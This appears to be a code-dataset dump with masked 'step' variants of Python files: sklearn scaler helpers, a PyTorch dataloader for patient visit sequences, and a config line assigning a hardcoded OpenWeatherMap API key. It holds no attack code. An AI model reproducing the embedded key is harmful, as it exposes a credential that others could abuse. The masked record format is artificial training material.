y_predict = np.exp(y_predict)
# y_predict = y_predict
return y_predict
def predict_model(config, model):
if type(config) == dict:
df = pd.DataFrame(config, index=[0])
else:
df = config
print(f'df: {df}')
# prepared_df, scaler = preprocess_transformers(df, 'minmax')
prepared_df = df
y_pred = model.predict(prepared_df)
print(f'y_pred {y_pred}')
# print(f'scaler {scaler}')
return y_pred
# return 1
|
normal
|
{
"blob_id": "890d50c741ffd576312c63dc450e274b4517bf12",
"index": 9856,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef preprocess_transformers(y_train, transf):\n if transf != 'ln':\n if transf == 'minmax':\n scaler = MinMaxScaler()\n scaler2 = MinMaxScaler()\n elif transf == 'standard':\n scaler = StandardScaler()\n scaler2 = StandardScaler()\n elif transf == 'robust':\n scaler = RobustScaler()\n scaler2 = RobustScaler()\n elif transf == 'boxcox':\n scaler = PowerTransformer(method='yeo-johnson')\n scaler2 = PowerTransformer(method='yeo-johnson')\n mm_scaler2 = scaler2.fit(y_train)\n y_train = mm_scaler2.transform(y_train)\n else:\n y_train = np.log(y_train).values\n mm_scaler2 = ''\n return y_train, mm_scaler2\n\n\ndef transformacion_inversa(y_predict, mm_scaler2):\n if mm_scaler2 != '':\n y_predict = mm_scaler2.inverse_transform(pd.DataFrame(y_predict))\n else:\n y_predict = np.exp(y_predict)\n return y_predict\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef preprocess_transformers(y_train, transf):\n if transf != 'ln':\n if transf == 'minmax':\n scaler = MinMaxScaler()\n scaler2 = MinMaxScaler()\n elif transf == 'standard':\n scaler = StandardScaler()\n scaler2 = StandardScaler()\n elif transf == 'robust':\n scaler = RobustScaler()\n scaler2 = RobustScaler()\n elif transf == 'boxcox':\n scaler = PowerTransformer(method='yeo-johnson')\n scaler2 = PowerTransformer(method='yeo-johnson')\n mm_scaler2 = scaler2.fit(y_train)\n y_train = mm_scaler2.transform(y_train)\n else:\n y_train = np.log(y_train).values\n mm_scaler2 = ''\n return y_train, mm_scaler2\n\n\ndef transformacion_inversa(y_predict, mm_scaler2):\n if mm_scaler2 != '':\n y_predict = mm_scaler2.inverse_transform(pd.DataFrame(y_predict))\n else:\n y_predict = np.exp(y_predict)\n return y_predict\n\n\ndef predict_model(config, model):\n if type(config) == dict:\n df = pd.DataFrame(config, index=[0])\n else:\n df = config\n print(f'df: {df}')\n prepared_df = df\n y_pred = model.predict(prepared_df)\n print(f'y_pred {y_pred}')\n return y_pred\n",
"step-4": "from sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import PowerTransformer\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.preprocessing import MinMaxScaler\nimport pandas as pd\nimport numpy as np\n\n\ndef preprocess_transformers(y_train, transf):\n if transf != 'ln':\n if transf == 'minmax':\n scaler = MinMaxScaler()\n scaler2 = MinMaxScaler()\n elif transf == 'standard':\n scaler = StandardScaler()\n scaler2 = StandardScaler()\n elif transf == 'robust':\n scaler = RobustScaler()\n scaler2 = RobustScaler()\n elif transf == 'boxcox':\n scaler = PowerTransformer(method='yeo-johnson')\n scaler2 = PowerTransformer(method='yeo-johnson')\n mm_scaler2 = scaler2.fit(y_train)\n y_train = mm_scaler2.transform(y_train)\n else:\n y_train = np.log(y_train).values\n mm_scaler2 = ''\n return y_train, mm_scaler2\n\n\ndef transformacion_inversa(y_predict, mm_scaler2):\n if mm_scaler2 != '':\n y_predict = mm_scaler2.inverse_transform(pd.DataFrame(y_predict))\n else:\n y_predict = np.exp(y_predict)\n return y_predict\n\n\ndef predict_model(config, model):\n if type(config) == dict:\n df = pd.DataFrame(config, index=[0])\n else:\n df = config\n print(f'df: {df}')\n prepared_df = df\n y_pred = model.predict(prepared_df)\n print(f'y_pred {y_pred}')\n return y_pred\n",
"step-5": "from sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import PowerTransformer\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.preprocessing import MinMaxScaler\nimport pandas as pd\nimport numpy as np\n\n\ndef preprocess_transformers(y_train, transf):\n if transf != 'ln':\n if transf == 'minmax':\n scaler = MinMaxScaler()\n scaler2 = MinMaxScaler()\n elif transf == 'standard':\n scaler = StandardScaler()\n scaler2 = StandardScaler()\n elif transf == 'robust':\n scaler = RobustScaler()\n scaler2 = RobustScaler()\n elif transf == 'boxcox':\n scaler = PowerTransformer(method='yeo-johnson')\n scaler2 = PowerTransformer(method='yeo-johnson')\n\n mm_scaler2 = scaler2.fit(y_train)\n y_train = mm_scaler2.transform(y_train)\n else:\n # y_train = y_train.values\n y_train = np.log(y_train).values\n mm_scaler2 = ''\n\n return y_train, mm_scaler2\n\n\ndef transformacion_inversa(y_predict, mm_scaler2):\n if mm_scaler2 != '':\n y_predict = mm_scaler2.inverse_transform(pd.DataFrame(y_predict))\n else:\n y_predict = np.exp(y_predict)\n # y_predict = y_predict\n\n return y_predict\n\n\ndef predict_model(config, model):\n if type(config) == dict:\n df = pd.DataFrame(config, index=[0])\n else:\n df = config\n\n print(f'df: {df}')\n # prepared_df, scaler = preprocess_transformers(df, 'minmax')\n\n prepared_df = df\n y_pred = model.predict(prepared_df)\n\n print(f'y_pred {y_pred}')\n # print(f'scaler {scaler}')\n\n return y_pred\n # return 1\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
# OpenWeatherMap API Key
api_key = "078c8443640961d5ce547c8269db5fd7"
|
normal
|
{
"blob_id": "4eb3d94a5fd22fc29000ec32475de9cbae1c183a",
"index": 5255,
"step-1": "<mask token>\n",
"step-2": "api_key = '078c8443640961d5ce547c8269db5fd7'\n",
"step-3": "# OpenWeatherMap API Key\napi_key = \"078c8443640961d5ce547c8269db5fd7\"\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# coding: utf-8
"""
Created on Mon Oct 29 12:57:40 2018
@authors Jzhu, Lrasmy , Xin128 @ DeguiZhi Lab - UTHealth SBMI
Last updated Feb 20 2020
"""
#general utilities
from __future__ import print_function, division
from tabulate import tabulate
import numpy as np
import random
import matplotlib.pyplot as plt
try:
import cPickle as pickle
except:
import pickle
import warnings
from torch.autograd import Variable
import torch.nn.functional as F
import torch.nn as nn
warnings.filterwarnings("ignore")
plt.ion()
#torch libraries
import torch
from torch.utils.data import Dataset, DataLoader
use_cuda = torch.cuda.is_available()
#use_cuda=False
# Dataset class loaded from pickles
class EHRdataFromPickles(Dataset):
def __init__(self, root_dir, file = None, transform=None, sort = True, model='RNN', test_ratio = 0, valid_ratio = 0):
"""
Args:
1) root_dir (string): Path to pickled file(s).
The directory contains the directory to file(s): specify 'file'
please create separate instances from this object if your data is split into train, validation and test files.
2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))
[310062,
0,
[[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],
[[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],
[[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]
where 310062: patient id,
0: no heart failure
[0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes.
3)transform (optional): Optional transform to be applied on a sample. Data augmentation related.
4)test_ratio, valid_ratio: ratios for splitting the data if needed.
"""
self.file = None
if file != None:
self.file = file
self.data = pickle.load(open(root_dir + file, 'rb'), encoding='bytes')
if sort:
self.data.sort(key=lambda pt:len(pt[2]),reverse=True)
self.test_ratio = test_ratio
self.valid_ratio = valid_ratio
else:
print('No file specified')
self.root_dir = root_dir
self.transform = transform
def __splitdata__(self, sort = True):
random.seed(3)
random.shuffle(self.data)
dataSize = len(self.data)
nTest = int(self.test_ratio * dataSize)
nValid = int(self.valid_ratio * dataSize)
test= self.data[:nTest]
valid = self.data[nTest:nTest+nValid]
train = self.data[nTest+nValid:]
if sort:
#sort train, validation and test again
test.sort(key=lambda pt:len(pt[2]),reverse=True)
valid.sort(key=lambda pt:len(pt[2]),reverse=True)
train.sort(key=lambda pt:len(pt[2]),reverse=True)
return train, test, valid
def __getitem__(self, idx, seeDescription = False):
'''
Return the patient data of index: idx of a 4-layer list
patient_id (pt_sk);
label: 0 for no, 1 for yes;
visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];
visit_codes: codes for each visit.
'''
if self.file != None:
sample = self.data[idx]
else:
print('No file specified')
if self.transform:
sample = self.transform(sample)
vistc = np.asarray(sample[2])
desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time': vistc[:,0],'visit_codes':vistc[:,1]}
if seeDescription:
'''
if this is True:
You will get a descriptipn of what each part of data stands for
'''
print(tabulate([['patient_id', desc['patient_id']], ['label', desc['label']],
['visit_time', desc['visit_time']], ['visit_codes', desc['visit_codes']]],
headers=['data_description', 'data'], tablefmt='orgtbl'))
#print('\n Raw sample of index :', str(idx))
return sample
def __len__(self):
'''
just the length of data
'''
if self.file != None:
return len(self.data)
else:
print('No file specified')
# Dataset class from already loaded pickled lists
class EHRdataFromLoadedPickles(Dataset):
def __init__(self, loaded_list, transform=None, sort = True, model='RNN'):
"""
Args:
1) loaded_list from pickled file
2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))
[310062,
0,
[[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],
[[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],
[[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]
where 310062: patient id,
0: no heart failure
[0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes.
3)transform (optional): Optional transform to be applied on a sample. Data augmentation related.
4)test_ratio, valid_ratio: ratios for splitting the data if needed.
"""
self.data = loaded_list
if sort:
self.data.sort(key=lambda pt:len(pt[2]),reverse=True)
self.transform = transform
def __getitem__(self, idx, seeDescription = False):
'''
Return the patient data of index: idx of a 4-layer list
patient_id (pt_sk);
label: 0 for no, 1 for yes;
visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];
visit_codes: codes for each visit.
'''
sample = self.data[idx]
if self.transform:
sample = self.transform(sample)
vistc = np.asarray(sample[2])
desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time': vistc[:,0],'visit_codes':vistc[:,1]}
if seeDescription:
'''
if this is True:
You will get a descriptipn of what each part of data stands for
'''
print(tabulate([['patient_id', desc['patient_id']], ['label', desc['label']],
['visit_time', desc['visit_time']], ['visit_codes', desc['visit_codes']]],
headers=['data_description', 'data'], tablefmt='orgtbl'))
#print('\n Raw sample of index :', str(idx))
return sample
def __len__(self):
return len(self.data)
def preprocess(batch,pack_pad,surv): ### LR Sep 30 20 added surv_m
# Check cuda availability
if use_cuda:
flt_typ=torch.cuda.FloatTensor
lnt_typ=torch.cuda.LongTensor
else:
lnt_typ=torch.LongTensor
flt_typ=torch.FloatTensor
mb=[]
mtd=[]
lbt=[]
seq_l=[]
bsize=len(batch) ## number of patients in minibatch
lp= len(max(batch, key=lambda xmb: len(xmb[-1]))[-1]) ## maximum number of visits per patients in minibatch
llv=0
for x in batch:
lv= len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])
if llv < lv:
llv=lv # max number of codes per visit in minibatch
for pt in batch:
sk,label,ehr_seq_l = pt
lpx=len(ehr_seq_l) ## no of visits in pt record
seq_l.append(lpx)
if surv: lbt.append(Variable(flt_typ([label])))### LR Sep 30 20 added surv_m
else: lbt.append(Variable(flt_typ([[float(label)]])))
ehr_seq_tl=[]
time_dim=[]
for ehr_seq in ehr_seq_l:
pd=(0, (llv -len(ehr_seq[1])))
result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1],dtype=int)).type(lnt_typ),pd,"constant", 0)
ehr_seq_tl.append(result)
time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],dtype=int)).type(flt_typ)))
ehr_seq_t= Variable(torch.stack(ehr_seq_tl,0))
lpp= lp-lpx ## diffence between max seq in minibatch and cnt of patient visits
if pack_pad:
zp= nn.ZeroPad2d((0,0,0,lpp)) ## (0,0,0,lpp) when use the pack padded seq and (0,0,lpp,0) otherwise.
else:
zp= nn.ZeroPad2d((0,0,lpp,0))
ehr_seq_t= zp(ehr_seq_t) ## zero pad the visits med codes
mb.append(ehr_seq_t)
time_dim_v= Variable(torch.stack(time_dim,0))
time_dim_pv= zp(time_dim_v) ## zero pad the visits time diff codes
mtd.append(time_dim_pv)
lbt_t= Variable(torch.stack(lbt,0))
mb_t= Variable(torch.stack(mb,0))
if use_cuda:
mb_t.cuda()
lbt_t.cuda()
return mb_t, lbt_t,seq_l, mtd
def preprocess_multilabel(batch,pack_pad): ### LR Feb 18 21 for multi-label
# Check cuda availability
if use_cuda:
flt_typ=torch.cuda.FloatTensor
lnt_typ=torch.cuda.LongTensor
else:
lnt_typ=torch.LongTensor
flt_typ=torch.FloatTensor
mb=[]
mtd=[]
lbt=[]
seq_l=[]
bsize=len(batch) ## number of patients in minibatch
lp= len(max(batch, key=lambda xmb: len(xmb[-1]))[-1]) ## maximum number of visits per patients in minibatch
llv=0
for x in batch:
lv= len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])
if llv < lv:
llv=lv # max number of codes per visit in minibatch
for pt in batch:
sk,label,ehr_seq_l = pt
lpx=len(ehr_seq_l) ## no of visits in pt record
seq_l.append(lpx)
lbt.append(Variable(flt_typ([label])))### LR Sep 30 20 added surv_m
ehr_seq_tl=[]
time_dim=[]
for ehr_seq in ehr_seq_l:
pd=(0, (llv -len(ehr_seq[1])))
result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1],dtype=int)).type(lnt_typ),pd,"constant", 0)
ehr_seq_tl.append(result)
time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],dtype=int)).type(flt_typ)))
ehr_seq_t= Variable(torch.stack(ehr_seq_tl,0))
lpp= lp-lpx ## diffence between max seq in minibatch and cnt of patient visits
if pack_pad:
zp= nn.ZeroPad2d((0,0,0,lpp)) ## (0,0,0,lpp) when use the pack padded seq and (0,0,lpp,0) otherwise.
else:
zp= nn.ZeroPad2d((0,0,lpp,0))
ehr_seq_t= zp(ehr_seq_t) ## zero pad the visits med codes
mb.append(ehr_seq_t)
time_dim_v= Variable(torch.stack(time_dim,0))
time_dim_pv= zp(time_dim_v) ## zero pad the visits time diff codes
mtd.append(time_dim_pv)
lbt_t= Variable(torch.stack(lbt,0))
mb_t= Variable(torch.stack(mb,0))
if use_cuda:
mb_t.cuda()
lbt_t.cuda()
return mb_t, lbt_t,seq_l, mtd
#customized parts for EHRdataloader
def my_collate(batch):
if multilabel_m : mb_t, lbt_t,seq_l, mtd =preprocess_multilabel(batch,pack_pad) ### LR Sep 30 20 added surv_m
else: mb_t, lbt_t,seq_l, mtd = preprocess(batch,pack_pad,surv_m) ### LR Sep 30 20 added surv_m
return [mb_t, lbt_t,seq_l, mtd]
def iter_batch2(iterable, samplesize):
results = []
iterator = iter(iterable)
# Fill in the first samplesize elements:
for _ in range(samplesize):
results.append(iterator.__next__())
random.shuffle(results)
return results
class EHRdataloader(DataLoader):
    """``torch.utils.data.DataLoader`` specialization for EHR minibatches.

    Uses :func:`my_collate` by default to pad variable-length visit
    sequences, and publishes the collation options (``packPadMode``,
    ``surv``, ``multilbl``) through module-level globals so the module-level
    collate function can see them.

    Parameters beyond the standard DataLoader ones:
        packPadMode: pad visits at the end (True, for pack_padded_sequence)
            or at the front (False).
        surv: survival-analysis label formatting in :func:`preprocess`.
        multilbl: route batches through :func:`preprocess_multilabel`.
    """

    def __init__(self, dataset, batch_size=128, shuffle=False, sampler=None,
                 batch_sampler=None, num_workers=0, collate_fn=my_collate,
                 pin_memory=False, drop_last=False, timeout=0,
                 worker_init_fn=None, packPadMode=False, surv=False,
                 multilbl=False):
        # BUG FIX: forward the caller's options to DataLoader instead of
        # silently discarding them — the original re-passed the literal
        # defaults (shuffle=False, num_workers=0, ...) to super().__init__,
        # so every non-default argument was ignored. Defaults are unchanged,
        # so existing callers that relied on the defaults behave identically.
        DataLoader.__init__(self, dataset, batch_size=batch_size,
                            shuffle=shuffle, sampler=sampler,
                            batch_sampler=batch_sampler,
                            num_workers=num_workers, collate_fn=collate_fn,
                            pin_memory=pin_memory, drop_last=drop_last,
                            timeout=timeout, worker_init_fn=worker_init_fn)
        self.collate_fn = collate_fn
        # my_collate is a module-level function (DataLoader workers must be
        # able to pickle it), so the per-loader collation flags have to be
        # communicated through module globals rather than instance state.
        global pack_pad
        global surv_m
        global multilabel_m
        pack_pad = packPadMode
        surv_m = surv
        multilabel_m = multilbl
        if multilabel_m:
            print('multilabel data processing')
########END of main contents of EHRDataloader############
|
normal
|
{
"blob_id": "0cef70b8d661fe01ef4a1eda83a21e1186419a0d",
"index": 5038,
"step-1": "<mask token>\n\n\nclass EHRdataFromPickles(Dataset):\n\n def __init__(self, root_dir, file=None, transform=None, sort=True,\n model='RNN', test_ratio=0, valid_ratio=0):\n \"\"\"\n Args:\n 1) root_dir (string): Path to pickled file(s).\n The directory contains the directory to file(s): specify 'file' \n please create separate instances from this object if your data is split into train, validation and test files. \n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes.\n \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. 
\n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.file = None\n if file != None:\n self.file = file\n self.data = pickle.load(open(root_dir + file, 'rb'), encoding=\n 'bytes')\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.test_ratio = test_ratio\n self.valid_ratio = valid_ratio\n else:\n print('No file specified')\n self.root_dir = root_dir\n self.transform = transform\n\n def __splitdata__(self, sort=True):\n random.seed(3)\n random.shuffle(self.data)\n dataSize = len(self.data)\n nTest = int(self.test_ratio * dataSize)\n nValid = int(self.valid_ratio * dataSize)\n test = self.data[:nTest]\n valid = self.data[nTest:nTest + nValid]\n train = self.data[nTest + nValid:]\n if sort:\n test.sort(key=lambda pt: len(pt[2]), reverse=True)\n valid.sort(key=lambda pt: len(pt[2]), reverse=True)\n train.sort(key=lambda pt: len(pt[2]), reverse=True)\n return train, test, valid\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n if self.file != None:\n sample = self.data[idx]\n else:\n print('No file specified')\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n \"\"\" \n just the length of data\n 
\"\"\"\n if self.file != None:\n return len(self.data)\n else:\n print('No file specified')\n\n\nclass EHRdataFromLoadedPickles(Dataset):\n\n def __init__(self, loaded_list, transform=None, sort=True, model='RNN'):\n \"\"\"\n Args:\n 1) loaded_list from pickled file\n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes. \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. \n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.data = loaded_list\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.transform = transform\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n sample = self.data[idx]\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 
'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n return len(self.data)\n\n\ndef preprocess(batch, pack_pad, surv):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n if surv:\n lbt.append(Variable(flt_typ([label])))\n else:\n lbt.append(Variable(flt_typ([[float(label)]])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef preprocess_multilabel(batch, pack_pad):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n 
if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n lbt.append(Variable(flt_typ([label])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef my_collate(batch):\n if multilabel_m:\n mb_t, lbt_t, seq_l, mtd = preprocess_multilabel(batch, pack_pad)\n else:\n mb_t, lbt_t, seq_l, mtd = preprocess(batch, pack_pad, surv_m)\n return [mb_t, lbt_t, seq_l, mtd]\n\n\ndef iter_batch2(iterable, samplesize):\n results = []\n iterator = iter(iterable)\n for _ in range(samplesize):\n results.append(iterator.__next__())\n random.shuffle(results)\n return results\n\n\nclass EHRdataloader(DataLoader):\n\n def __init__(self, dataset, batch_size=128, shuffle=False, sampler=None,\n batch_sampler=None, num_workers=0, collate_fn=my_collate,\n pin_memory=False, drop_last=False, timeout=0, worker_init_fn=None,\n packPadMode=False, surv=False, multilbl=False):\n DataLoader.__init__(self, dataset, batch_size=batch_size, shuffle=\n False, sampler=None, batch_sampler=None, num_workers=0,\n collate_fn=my_collate, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None)\n self.collate_fn = collate_fn\n global pack_pad\n global surv_m\n global multilabel_m\n pack_pad = 
packPadMode\n surv_m = surv\n multilabel_m = multilbl\n if multilabel_m:\n print('multilabel data processing')\n",
"step-2": "<mask token>\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n<mask token>\nwarnings.filterwarnings('ignore')\nplt.ion()\n<mask token>\n\n\nclass EHRdataFromPickles(Dataset):\n\n def __init__(self, root_dir, file=None, transform=None, sort=True,\n model='RNN', test_ratio=0, valid_ratio=0):\n \"\"\"\n Args:\n 1) root_dir (string): Path to pickled file(s).\n The directory contains the directory to file(s): specify 'file' \n please create separate instances from this object if your data is split into train, validation and test files. \n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes.\n \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. 
\n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.file = None\n if file != None:\n self.file = file\n self.data = pickle.load(open(root_dir + file, 'rb'), encoding=\n 'bytes')\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.test_ratio = test_ratio\n self.valid_ratio = valid_ratio\n else:\n print('No file specified')\n self.root_dir = root_dir\n self.transform = transform\n\n def __splitdata__(self, sort=True):\n random.seed(3)\n random.shuffle(self.data)\n dataSize = len(self.data)\n nTest = int(self.test_ratio * dataSize)\n nValid = int(self.valid_ratio * dataSize)\n test = self.data[:nTest]\n valid = self.data[nTest:nTest + nValid]\n train = self.data[nTest + nValid:]\n if sort:\n test.sort(key=lambda pt: len(pt[2]), reverse=True)\n valid.sort(key=lambda pt: len(pt[2]), reverse=True)\n train.sort(key=lambda pt: len(pt[2]), reverse=True)\n return train, test, valid\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n if self.file != None:\n sample = self.data[idx]\n else:\n print('No file specified')\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], 